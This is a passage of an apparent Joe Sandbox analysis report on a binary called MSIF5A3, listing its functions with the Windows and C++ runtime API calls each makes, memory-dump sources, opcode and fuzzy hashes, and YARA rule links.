                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3931714976-0
                                                                                                                                                                                                                              • Opcode ID: 73a04a5c30d594aca8f1ba7c1fd8c9f340e673a2d9a9a50f8d8459757f610968
                                                                                                                                                                                                                              • Instruction ID: e6a14ffb900b99564f024a4946016bc5f2ef51babf094de8dee52c66e6fc8e32
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73a04a5c30d594aca8f1ba7c1fd8c9f340e673a2d9a9a50f8d8459757f610968
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED5100B0900299DFEB15CF59C8847AFBFB5FF10314F24415AE855AB392E7B59A00CB81
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005EB700 Relevance: 9.1, APIs: 6, Instructions: 128memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005EB731
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005EB74F
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005EB777
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000008,00000000,FAB1B776,?,00000000,00000000), ref: 005EB7CF
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005EB863
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005EB88D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3931714976-0
                                                                                                                                                                                                                              • Opcode ID: a8d5cb18a546b2a3162b37aa48ff912129abbb588a6fbe14a8b40a645baff124
                                                                                                                                                                                                                              • Instruction ID: 84c99a069c6fdf8ffb2dc89bc74c437ba88bccb59aac28be8b7beb3d9b811acd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8d5cb18a546b2a3162b37aa48ff912129abbb588a6fbe14a8b40a645baff124
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C851AA70904299DBDB29CF59C884BAEBFB5FB54310F24815DE885AB382D775AE01CB80
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00610351 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                              • String ID: a/p$am/pm
                                                                                                                                                                                                                              • API String ID: 3509577899-3206640213
                                                                                                                                                                                                                              • Opcode ID: 8c824b5781f39f3f1cd8b1925b0ab81ec8fa9860e79ec2d32a75360b78af253c
                                                                                                                                                                                                                              • Instruction ID: 406698699b9bb5449a13ad4169422a341d193cd90ee36ccc7b1ff6907db0915e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c824b5781f39f3f1cd8b1925b0ab81ec8fa9860e79ec2d32a75360b78af253c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0C1B035900206DAEF248F68C985AFAB7B3FF59700F1C4049E505AB390D2B5ADC1CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E5890 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 60COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,75EF4450,005E5646,?,?,?,?,?), ref: 005E5898
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID: <Sc$Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                                                                                                                                                                              • API String ID: 1452528299-2352683828
                                                                                                                                                                                                                              • Opcode ID: 8277748d1592dc1eaa4db132f07f729090385589c0fec157b7003118f5c6ccb0
                                                                                                                                                                                                                              • Instruction ID: a8f60142f4f185b6799d8c20ef97f6f7b9342a26e0865376b690471147472013
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8277748d1592dc1eaa4db132f07f729090385589c0fec157b7003118f5c6ccb0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9511E156A10762C7CB381F6D9800376AAE5EF50798F65087FD8CAC7391FAB58C8183D0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00605978 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0060596F,00604900,0060358F), ref: 00605986
                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00605994
                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006059AD
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,0060596F,00604900,0060358F), ref: 006059FF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                              • Opcode ID: 38355095d5728f8c5f165c94b7609387ea16d532e85878e5d56eff7dfb85c325
                                                                                                                                                                                                                              • Instruction ID: 5aeb01b772c51148fa041e38370cb0a3766b7e444a6dd43fe84b6dd1e50ae58a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38355095d5728f8c5f165c94b7609387ea16d532e85878e5d56eff7dfb85c325
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E801F53228DA52DFE77C2774AD86AAB2757DB01774720032DF011942F0EF520C115684
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E3230 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 260fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,URL,00000000,?,FAB1B776,?,00000004), ref: 005E3294
                                                                                                                                                                                                                              • MoveFileW.KERNEL32(?,00000000), ref: 005E354A
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 005E3592
                                                                                                                                                                                                                                • Part of subcall function 005E1A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 005E1AF7
                                                                                                                                                                                                                                • Part of subcall function 005E1A70: LocalFree.KERNEL32(7FFFFFFE), ref: 005E1B7D
                                                                                                                                                                                                                                • Part of subcall function 005E2E60: LocalFree.KERNEL32(?,FAB1B776,?,?,00623C40,000000FF,?,005E1242,FAB1B776,?,?,00623C75,000000FF), ref: 005E2EB1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                                                                                                                                                                                              • String ID: URL$url
                                                                                                                                                                                                                              • API String ID: 853893950-346267919
                                                                                                                                                                                                                              • Opcode ID: c8f638a4e1ed48120adb92df5e25697bd7827ad1dc02f075a0c57e52fe2d026a
                                                                                                                                                                                                                              • Instruction ID: 6d5aeb75a5103e62c3379bc8f61addd4876b959857ec984cbb97404f1774aa90
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8f638a4e1ed48120adb92df5e25697bd7827ad1dc02f075a0c57e52fe2d026a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AC16970D142A99ADB28DF24CC9C7EDBBB4BF54304F1042D9D049A7291EBB56B88CF91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00605A58 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 1740715915-1377069549
                                                                                                                                                                                                                              • Opcode ID: 1af51561498ee6988ff72fd932bd4649cce495f24137e2474504a9bc42bd46be
                                                                                                                                                                                                                              • Instruction ID: ba9b9df703a3557d852b535d51459062d3720ecc7cf2409a88f055b8824e3026
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1af51561498ee6988ff72fd932bd4649cce495f24137e2474504a9bc42bd46be
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D251CDB2680B069FDB2C9F14D8A1BAB77A6EF14310F14462DE902962D1E771EC80CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E36D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129libraryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 005E3735
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00624215,000000FF), ref: 005E381A
                                                                                                                                                                                                                                • Part of subcall function 005E2310: GetProcessHeap.KERNEL32 ref: 005E2365
                                                                                                                                                                                                                                • Part of subcall function 005E46F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,005E3778,-00000010,?,?,?,00624215,000000FF), ref: 005E4736
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 005E37C6
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00624215,000000FF), ref: 005E37DB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                                                                                                                                                                              • String ID: ntdll.dll
                                                                                                                                                                                                                              • API String ID: 3941625479-2227199552
                                                                                                                                                                                                                              • Opcode ID: e775d8ddfe3e51406e9d40f374a2ea68d396a454919deae98d24718921ff9435
                                                                                                                                                                                                                              • Instruction ID: 0c0dcd8dda323927c228110722c0b0ce07e372e833ecf3c0c5ccbd2aca9f3b15
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e775d8ddfe3e51406e9d40f374a2ea68d396a454919deae98d24718921ff9435
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A41F3706006469FDB18DFA9CC49BAEBBA4FF14310F14452DF856972C1EBB09B04CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FD3CB Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 005FD3D2
                                                                                                                                                                                                                                • Part of subcall function 005F254E: __EH_prolog3.LIBCMT ref: 005F2555
                                                                                                                                                                                                                                • Part of subcall function 005F254E: std::_Lockit::_Lockit.LIBCPMT ref: 005F255F
                                                                                                                                                                                                                                • Part of subcall function 005F254E: std::_Lockit::~_Lockit.LIBCPMT ref: 005F25D0
                                                                                                                                                                                                                              • _Find_elem.LIBCPMT ref: 005FD46E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                              • String ID: 2`$%.0Lf$0123456789-
                                                                                                                                                                                                                              • API String ID: 2544715827-4230292951
                                                                                                                                                                                                                              • Opcode ID: 557f91390ce4aec8cff8aaa313063b9e2b99b7bdbdd8486de9623c0b753ab953
                                                                                                                                                                                                                              • Instruction ID: 5a34e0378327332e8f1b850c37a21b94f0c3d5bd8f3959b494974fd3eec4901c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 557f91390ce4aec8cff8aaa313063b9e2b99b7bdbdd8486de9623c0b753ab953
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A415E7190021DDFCF15DFA4C888AEE7FB6FF44314F000159E911AB256DB74AA56CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FD66F Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 005FD676
                                                                                                                                                                                                                                • Part of subcall function 005E8610: std::_Lockit::_Lockit.LIBCPMT ref: 005E8657
                                                                                                                                                                                                                                • Part of subcall function 005E8610: std::_Lockit::_Lockit.LIBCPMT ref: 005E8679
                                                                                                                                                                                                                                • Part of subcall function 005E8610: std::_Lockit::~_Lockit.LIBCPMT ref: 005E86A1
                                                                                                                                                                                                                                • Part of subcall function 005E8610: std::_Lockit::~_Lockit.LIBCPMT ref: 005E880E
                                                                                                                                                                                                                              • _Find_elem.LIBCPMT ref: 005FD712
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                              • String ID: 2`$0123456789-$0123456789-
                                                                                                                                                                                                                              • API String ID: 3042121994-1341426164
                                                                                                                                                                                                                              • Opcode ID: b0fa96b6c27fb02cc1c446f893ec8535bdc75d7f6bf0899e1a1d15ca69da61e6
                                                                                                                                                                                                                              • Instruction ID: e1aab076bb8590ed38be07db124172ce61838f703944d4a1da09f9f210097e3b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0fa96b6c27fb02cc1c446f893ec8535bdc75d7f6bf0899e1a1d15ca69da61e6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15418B3190121DDFCF05EFA4C884AEEBFB6FF48310F100059E911AB256DB349A56CBA5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0060175A Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00601761
                                                                                                                                                                                                                                • Part of subcall function 005E9270: std::_Lockit::_Lockit.LIBCPMT ref: 005E92A0
                                                                                                                                                                                                                                • Part of subcall function 005E9270: std::_Lockit::_Lockit.LIBCPMT ref: 005E92C2
                                                                                                                                                                                                                                • Part of subcall function 005E9270: std::_Lockit::~_Lockit.LIBCPMT ref: 005E92EA
                                                                                                                                                                                                                                • Part of subcall function 005E9270: std::_Lockit::~_Lockit.LIBCPMT ref: 005E9422
                                                                                                                                                                                                                              • _Find_elem.LIBCPMT ref: 006017FB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                              • String ID: 2`$0123456789-$0123456789-
                                                                                                                                                                                                                              • API String ID: 3042121994-1341426164
                                                                                                                                                                                                                              • Opcode ID: 3d0c5539db08757ca7f5d9f3692b8fb8083bd0f5393bdc1eb4a804986a247a0c
                                                                                                                                                                                                                              • Instruction ID: 460487fdae4d927976ddf05fe3cf74df6fb9a5834b5d7e48521c74b3001ba5a2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d0c5539db08757ca7f5d9f3692b8fb8083bd0f5393bdc1eb4a804986a247a0c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A416B31901219DFCF09DFA4D885ADEBFB6BF45310F10409AF811AB292DB70DA02CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E621F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 005E1A20: LocalFree.KERNEL32(?), ref: 005E1A42
                                                                                                                                                                                                                                • Part of subcall function 00603E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,005E1434,?,?,005ED341,005E1434,00638B5C,?,005E1434,?,00000000), ref: 00603EBA
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(FAB1B776,FAB1B776,?,?,00000000,00624981,000000FF), ref: 005E62EB
                                                                                                                                                                                                                                • Part of subcall function 00602C98: EnterCriticalSection.KERNEL32(0063DD3C,?,?,?,005E23B6,0063E638,FAB1B776,?,?,00623D6D,000000FF), ref: 00602CA3
                                                                                                                                                                                                                                • Part of subcall function 00602C98: LeaveCriticalSection.KERNEL32(0063DD3C,?,?,?,005E23B6,0063E638,FAB1B776,?,?,00623D6D,000000FF), ref: 00602CE0
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 005E62B0
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 005E62B7
                                                                                                                                                                                                                                • Part of subcall function 00602C4E: EnterCriticalSection.KERNEL32(0063DD3C,?,?,005E2427,0063E638,00626B40), ref: 00602C58
                                                                                                                                                                                                                                • Part of subcall function 00602C4E: LeaveCriticalSection.KERNEL32(0063DD3C,?,?,005E2427,0063E638,00626B40), ref: 00602C8B
                                                                                                                                                                                                                                • Part of subcall function 00602C4E: RtlWakeAllConditionVariable.NTDLL ref: 00602D02
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                              • API String ID: 1333104975-3789238822
                                                                                                                                                                                                                              • Opcode ID: 8035b5d2123d1795ea645c350802a781b758d54f4ac47aa15a4488de8f26e255
                                                                                                                                                                                                                              • Instruction ID: 6b0b1724f403648d922bc92821b436daf26cd250cafb6ce14107bbf699f6d62d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8035b5d2123d1795ea645c350802a781b758d54f4ac47aa15a4488de8f26e255
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C62157B1C44646DFCB14DF90DD0AF9E7BAAFB18750F000229F911932D0D7716900CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F8451 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
